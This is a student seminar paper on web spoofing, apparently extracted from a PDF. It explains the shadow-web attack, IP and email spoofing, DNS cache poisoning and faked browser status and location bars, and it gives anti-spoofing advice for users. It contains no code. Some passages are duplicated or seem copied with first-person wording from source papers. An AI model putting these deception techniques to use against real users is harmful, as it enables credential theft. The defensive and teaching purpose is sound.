Spoofing Sem

8/9/2019 Spoofing Sem

1/20

A

PAPER PRESENTATION

ON

Web Spoofing

Presented by: Guided

by:

Miss. Neha C. Gaopande Prof.A.D.

Raut

(Final Year,IT)

JAWAHARLAL DARDA INSTITUTE OF

ENGINEERING

AND TECHNOLOGY, YAVATMAL

1


2/20

ABSTRACT

The web spoofing describes an Internet security attack that

could endanger the privacy of World Wide Web users and the integrity

of their data. The attack can be carried out on today's systems,

endangering users of the most common Web browsers. Web spoofing

allows an attacker to create a "shadow copy" of the entire World Wide

Web. Accesses to the shadow Web are funneled through the attacker's

machine, allowing the attacker to monitor all of the victim's activities

including any passwords or account numbers the victim enters. The

attacker can also cause false or misleading data to be sent to Web

servers in the victim's name, or to the victim in the name of any Web

server. In short, the attacker observes and controls everything the

victim does on the Web. First, the attacker causes a browser window to

be created on the victim's machine, with some of the normal status

and menu information replaced by identical-looking components

supplied by the attacker. Then, the attacker causes all Web pages

destined for the victim's machine to be routed through the attacker's

server. On the attacker's server, the pages are rewritten in such a way

that their appearance does not change at all, but any actions taken by

the victim would be logged by the attacker. In addition, any attempt by

the victim to load a new page would cause the newly-loaded page to

be routed through the attacker's server, so the attack would continue

on the new page.

2


3/20

Table of contents

Title Page

1. Abstract2. Introduction3. Previous works4. What is web spoofing?5. How does the attack works?

6. Threat models and attacks6.1 Spoofing the whole page6.2 Types of Spoofing

7 Completing the illusion7.1 Status Line7.2 Location Bar7.3 Viewing the document source

8 Anti spoofing8.1 Short term solutions8.2 Long term solutions9 Future spoofing works10 Conclusion

11 References

3


4/20

1.INTRODUCTION

Web Spoofing is a security attack that allows an adversary to observe and modify all

web pages sent to the victim's machine, and observe all information entered into forms by

the victim. Web Spoofing works on both of the major browsers and is notprevented by

"secure" connections. The attacker can observe and modify all web pages and form

submissions, even when the browser's "secure connection" indicator is lit. The user sees

no indication that anything is wrong.

The attack is implemented using JavaScript and Web server plug-ins, and works in two

parts. First, the attacker causes a browser window to be created on the victim's machine,

with some of the normal status and menu information replaced by identical- looking

components supplied by the attacker. Then, the attacker causes all Web pages destined

for the victim's machine to be routed through the attacker's server. On the attacker's

server, the pages are rewritten in such a way that their appearance does not change at all,but any actions taken by the victim (such as clicking on a link) would be logged by the

attacker. In addition, any attempt by the victim to load a new page would cause the

newly-loaded page to be routed through the attacker's server, so the attack would

continue on the new page.The attack is initiated when the victim visits a malicious Web

4


5/20

page, or receives a malicious email message (if the victim uses an HTML-enabled email

reader).

2.PREVIOUS WORKS

As early as 1996, Felten et al at Princeton [8] originated the term web

spoofing and explored spoofing attacks on Netscape Navigator and

Microsoft Internet Explorer that allowed an attacker to create a

shadow copy of the true web. When the victim accesses the shadowWeb through the attackers servers, the attacker can monitor all of the

victims activities and get or modify the information the victim enters,

including passwords or credit card numbers. Source code is not

available; according to the paper, the attack used JavaScript to rewrite

the hyperlink information shown on the status bar; to hide the real

location bar and replace it with a fake one that also accept keyboard

input, allowing the victim to type in URLs normally (which then get

rewritten to go the attackers machine); and to replace the Document

Source button the menu bar (to show the source the victim expects,

not the real source).Apparently unable to spoof the SSL icon, the

Princeton attack spoofed SSL by having the user open a real SSL

session to the attackers machine.

5


6/20

In 1996, Tygar and Whitten from CMU [20] demonstrated how a Java

applet or similar remote execution can be used as a trojan horse. The

Java applet could be inserted into a client machine through a bogus

remote page and pop up a dialog window similar to the true login

windows. With the active textfield on the top of the image, the Trojan

horse applet would capture the keyboard input and transfer them to

attackers machine. Tygar and Whitten also gave a way to prevent

these attack: window personalization.

3. WHAT IS WEB SPOOFING?

Web spoofing is a kind of electronic con game in which the attacker creates a

convincing but false copy of the entire World Wide Web. The false Web looks just like

the real one: it has all the same pages and links. However, the attacker controls the false

Web, so that all network traffic between the victim's browser and the Web goes through

the attacker.

Consequences Since the attacker can observe or modify any data going from

the victim to Web servers, as well as controlling all return traffic from Web servers to the

victim, the attacker has many possibilities. These include surveillance and tampering. In

Surveillance, the attacker can passively watch the traffic, recording which pages the

victim visits and the contents of those pages. When the victim fills out a form, the entered

data is transmitted to a Web server, so the attacker can record that too, along with the

response sent back by the server. The attacker can carry out surveillance even if the

victim has a "secure" connection (usually via Secure Sockets Layer) to the server, that is,

even if the victim's browser shows the secure-connection icon (usually an image of a lock

or a key) tampering. The attacker is also free to modify any of the data traveling in either

6


7/20

direction between the victim and the Web. The attacker can modify form data submitted

by the victim.

3.1 HOW DOES THE ATTACK WORKS ?

7


8/20

The first vulnerability is due to the validation that the server's public

key, which SSL obtains from the servers certificate, belongs to the site

with the given location (URL). This validation is the responsibility of the

application (e.g browser) and not part of the SSL specifications; SSL

merely passes the servers certificate to the application. Currently,

browsers are vulnerable to the false certificate attack. Therefore, the

adversary has the matching private key and can pass SSL server

authentication for the victim web page. In the current design of

browsers, the user is responsible to validate the authenticity of web

sites, by noting relevant status areas in the browser user interface. The

relevant status areas are the location bar, containing the URL

(Universal Resource Locator), and the SSL indicator (typically, as open

lock for insecure sites, closed lock for SSL protected sites). We are

mostly interested in the web spoofing attack, which exploits this

vulnerability, by directing the browser to an adversary-controlled clone

site that resembles the original, victim site, which the user wanted to

access. Web spoofing attacks are very common, and are the most

severe threat to secure e-commerce currently.

8


9/20

The process begins when the user selects the web site, by entering its

location (URL) or by invoking a bookmark or link, e.g. in an e-mail

message. The browser, or the underlying transport layer, then sends

the name of the domain of the site, e.g. xxx.com, to a Domain Name

Server . The Domain Name Server returns the IP address of the site.Now, the client sends an HTTP request to the site, using the IP address

of the site , and receives the HTTP response containing the web page ,

these two steps are protected by SSL, if the URL indicates the use of

SSL (by using the https protocol in the URL). Finally, the browser

presents the page to the user . If we did notuse SSL, an intercepting

adversary could attack all three

pairs of steps in this process, as follows:

1. Trick the user into requesting the spoofed web site in step 1a,

and/or into using http rather than https, i.e. not protect the request

and response using SSL.

9


10/20

2. Return an incorrect IP address for the web server in step 2b. This

can be done

by exploiting one of the known weaknesses of the DNS protocol and/or

of (many)

DNS servers. A typical example is DNS cache poisoning (`pushing`

false domain IP mappings to the cache of DNS servers).

3. Intercept (capture) the request in step 3a (sent to the right IP

address) and

return a response in step 3b from the spoofed site.

3.2 THREAT MODELS AND ATTACKS

The initial design of Internet and Web protocols assumed benign environment,

where servers, clients and routers cooperate and follow the standard protocols, except for

unintentional errors. In particular, since currently Internet access is widely available, it is

very easy for attackers to obtain many client and even host connections and addresses,

and use them to launch different attacks on the network itself and on other hosts and

clients. In particular, with the proliferation of commercial domain name registrarsallowing automated, low-cost registration in most top level domains, it is currently very

easy for attackers to acquire essentially any unallocated domain name, and place there

malicious hosts and clients. We call this the unallocated domain adversary : an adversary

who is able to issue and receive messages using many addresses in any domain name,

excluding the finite list of already allocated domain names. This is probably the most

basic and common type of adversary. The sensitive web sites are usually protected using

the SSL protocols. Intercepting adversaries are able to send and intercept messages to

and from all domains. Indeed, even without SSL, the HTTP protocol securely

authenticates web pages against spoofing adversaries, which are able to send messages

from all domains, but receive only messages sent to unallocated domains. However, the

security by SSL/TLS is only with respect to the address (URL) and security mechanism

requested by the application

10


11/20

4. SPOOFING THE WHOLE PAGE: Whole spoofed page

In a spoofing attack, the attacker creates misleading context in order to trick the

victim into making an inappropriate security-relevant decision. A spoofing attack is like

a con game: the attacker sets up a false but convincing world around the victim. The

victim does something that would be appropriate if the false world were real.

Unfortunately, activities that seem reasonable in the false world may have disastrous

effects in the real world. Spoofing attacks are possible in the physical world as well as

the electronic one. People using computer systems often make security-relevant decisions

based on contextual cues they see. For example, you might decide to type in your bank

account number because you believe you are visiting your bank's Web page. This belief

might arise because the page has a familiar look, because the bank's URL appears in thebrowser's location line, or for some other reason. To appreciate the range and severity of

possible spoofing attacks, we must look more deeply into two parts of the definition of

spoofing: security-relevant decisions and context

11


12/20

In a spoofing attack, the attacker creates misleading context in order to trick the victim

into making an inappropriate security-relevant decision. A spoofing attack is like a con

game: the attacker sets up a false but convincing world around the victim. The victim

does something that would be appropriate if the false world were real. Unfortunately,

activities that seem reasonable in the false world may have disastrous effects in the real

world.

12


13/20

5. TYPES OF SPOOFING

There are different types of spoofing are

Email spoofing ,

IP spoofing, etc.

IP spoofing:

Attacker uses IP address of another computer to acquire information or gain access.

IP spoofing is the creation of TCP/IP packets with somebody else's IP address in the

header.

Routers use the destination IP address to forward packets, but ignore the source

IP address.

The source IP address is used only by the destination machine, when it responds

back to the source.

When an attacker spoofs someones IP address, the victims reply goes back to

that address.

Since the attacker does not receive packets back, this is called a one-way attack

or blind spoofing.

Email spoofing:

Attacker sends email but makes it appear to come from someone else.

With email spoofing, someone receives email that appears to have originated from

one source when it actually was sent from another source.

Purposes of email spoofing:

Hiding senders identity

Impersonating someone

13


14/20

Implicating someone

Trick someone into making a damaging statement or releasing sensitive information

Fig : A Spoofed email was sent to customers indicating the

Message was sent on behalf of ebay

14
http://antivirus.about.com/od/emailscams/ss/phishing_5.htm


15/20

6. COMPLETING THE ILLUSION

The attack as described thus far is fairly effective, but it is not perfect. There is still some

remaining context that can give the victim clues that the attack is going on.However, it is

possible for the attacker to eliminate virtually all of the remaining clues of the attack's

existence. Such evidence is not too hard to eliminate because browsers are very

customizable. The ability of a Web page to control browser behavior is often desirable,

but when the page is hostile it can be dangerous.

6.1 The Status Line:

The status line is a single line of text at the bottom of the browser window that displays

various messages, typically about the status of pending Web transfers. The attack as

described so far leaves two kinds of evidence on the status line. First, when the mouse isheld over a Web link, the status line displays the URL the link points to. Thus, the victim

might notice that a URL has been rewritten. Second, when a page is being fetched, the

status line briefly displays the name of the server being contacted.

6.2 The Location Bar:

The browser's location line displays the URL of the page currently being shown. Thevictim can also type a URL into the location line, sending the browser to that URL. The

attack as described so far causes a rewritten URL to appear in the location line, giving the

victim a possible indication that an attack is in progress. The real location line can be

hidden and replace it by a fake location line which looks right and is in the expected

15


16/20

place. The fake location line can show the URL the victim expects to see. The fake

location line can also accept keyboard input, allowing the victim to type in

URLs normally.

6.3 Viewing the Document Source:

There is one clue that the attacker cannot eliminate, but it is very unlikely to be noticed.

By using the browser's "view source" feature, the victim can look at the HTML source for

the currently displayed page. By looking for rewritten URLs in the HTML source, the

victim can spot the attack. A related clue is available if the victim chooses the browser's

"view document information" menu item. This will display information including the

document's real URL, possibly allowing the victim to notice the attack.

16


17/20

7. Anti-Spoofing

In this section we provide means to counter spoofing, focusing on what users can do,

what software that can be used and what laws that is in place for handling this type of

crime.

1.Users

Most of the people get aware of that something is wrong with their email or the site their

currently viewing. Still, there will always be newcomers to the net and some training is

required for people to understand the difference of good and bad email/sites. One of the

most common ways to fool a user is focused toward the user to reveal its username,

passwords or account information. Most companies will never ask for your information

in a mail and in case they loose your password or account due to an error, they will

simply make you a new one.

2. Software

While training is not always an option there has been developed different software to help

you combat the problem. In a Pc World article [PCW] Tom Spring has tested three different

tools, that use different approaches to detect phishing. The first one is Anti-fraud toolbar

from Cloudmark is based on a blacklist of known bad sites. When a user attempts to enter a

site on the http://www.cloudmark.com/blacklist the program will issue a warning stating that the

site is not safe to go to.The second one is Trustbar from Comodo and it is based on a white-

list of good sites. When you surf on a site that is on the white-list the companies name will

appear on the toolbar, when not on the white list a warning will be issued, but it doesnt

prevent you from surfing further. A list of other tools can be obtained at

http://www.antiphishing.org/solutions.html\#toolbars provide much protection

17
http://www.cloudmark.com/http://www.cloudmark.com/http://www.antiphishing.org/http://www.cloudmark.com/http://www.antiphishing.org/


18/20

7.1 Short-term Solution

In the short run, the best defense is to follow a three-part strategy:

1. Disable JavaScript in your browser so the attacker will be unable to hide the evidence

of the attack;

2. Make sure your browsers location line is always visible;

3. Pay attention to the URLs displayed on your browsers location line, making sure they

always point to the server you think youre connected to.

This strategy will significantly lower the risk of attack, though you could still be

victimized if you are not conscientious about watching the location line.

7.2 Long-term solutions

Our initial motivation was not to attack but to defend: to build a better browser that, for

example, could clearly indicate security attributes of a server (and so enable clients to

securely use our server hardening techniques). None of above solutions are strong enough

to be a general solution for preventing web spoofing. A ideal browser should be a

platform which can enable all the modern web techniques to be full functional, and at the

same time supply unspoofable features to indicate the communication security.

8. FUTURE SPOOFING WORK

Our fake Web pages are not perfect. In our demonstration, we only implement enough

to prove the concept; however, as noted earlier, we are not yet able to forge some

18


19/20

aspects of legitimate browser behavior:

Creating convincing editable location lines appears to depend on the user

preferences, which we cannot yet learn. Either we gamble, or we do not have

editable lines.

We cannot yet obtain the users genuine history information for the pull down

history options.

9. Conclusion

Web spoofing has become a serious issue to the global internet community. More

organizations provide greater online access for their customers, and rely heavily ononline services in the way they do business. Understanding the tools and methods the

phishers have at their disposal is a crucial element in defending against these attacks.

However, the users can increase their security by following the following guidelines:

1.Always contact sensitive web sites by typing their address in the location bar, using a

bookmark or following a link from a secure site, preferably protected by SSL/TLS.

2.Never click on links from e-mail messages or from other non-trustworthy sources.

These could lead you to a URL-forwarding.

3.Be very careful to inspect the location bar and the SSL icon upon entering to sensitive

web pages.

4.If possible, restrict the damages due to spoofing by instructing your financial services

to limit online transactions in your account to cover only what you really need.

REFERENCE

19


20/20

1. http://webmasters-forums.com/web-spoofing-t-402.html

2. http://www.washington.edu/computing/windows/issue22/spoofing.html

3. http://www.cs.princeton.edu/sip/WebSpoofing/

4. http://www.cs.princeton.edu/sip/pub/spoofing.html

20
http://webmasters-forums.com/web-spoofing-t-402.htmlhttp://www.washington.edu/computing/windows/issue22/spoofing.htmlhttp://www.cs.princeton.edu/sip/WebSpoofing/http://www.cs.princeton.edu/sip/pub/spoofing.htmlhttp://webmasters-forums.com/web-spoofing-t-402.htmlhttp://www.washington.edu/computing/windows/issue22/spoofing.htmlhttp://www.cs.princeton.edu/sip/WebSpoofing/http://www.cs.princeton.edu/sip/pub/spoofing.html

Documents

Spoofing Sem